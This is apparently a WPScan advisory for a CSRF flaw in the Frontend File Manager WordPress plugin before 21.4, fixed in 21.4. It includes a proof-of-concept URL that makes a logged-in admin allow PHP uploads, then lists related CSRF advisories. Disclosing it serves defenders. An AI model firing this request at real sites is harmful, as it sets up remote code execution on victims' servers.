Frontend File Manager < 21.4 – Arbitrary Settings Update via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. As the plugin does not validate the allowed file type, this could lead to attackers making admins allowing PHP file to be uploaded by any authenticated users

Proof of Concept

Make a logged in admin open the URL below

https://example.com/wp-admin/admin-ajax.php?action=wpfm_save_settings&wpfm_file_types=php,html&wpfm_button_title=Select&wpfm_upload_title=Upload&wpfm_max_file_size=3mb&wpfm_disable_bootstarp=yes&wpfm_file_saved=File(s)+Uploaded!

Affects Plugins

nmedia-user-file-uploader

Fixed in 21.4

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

da8fe4b1-1505-40d2-b16c-1533a2a6051a

Timeline

Publicly Published

2022-09-26 (about 1 years ago)

Added

2022-09-26 (about 1 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2020-06-22

Title

WP-Pro-Quiz <= 0.37 - Arbitrary Quiz Deletion via CSRF

Published

2021-05-08

Title

Zlick Paywall < 2.2.2 - CSRF Bypasses

Published

2022-09-23

Title

SEO Redirection < 9.1 - 404 Error & History Deletion via CSRF

Published

2014-08-01

Title

WP DS FAQ Plus 1.0.3 - Multiple Unspecified CSRF

Published

2023-10-18

Title

Open Graph Metabox <= 1.4.4 - CSRF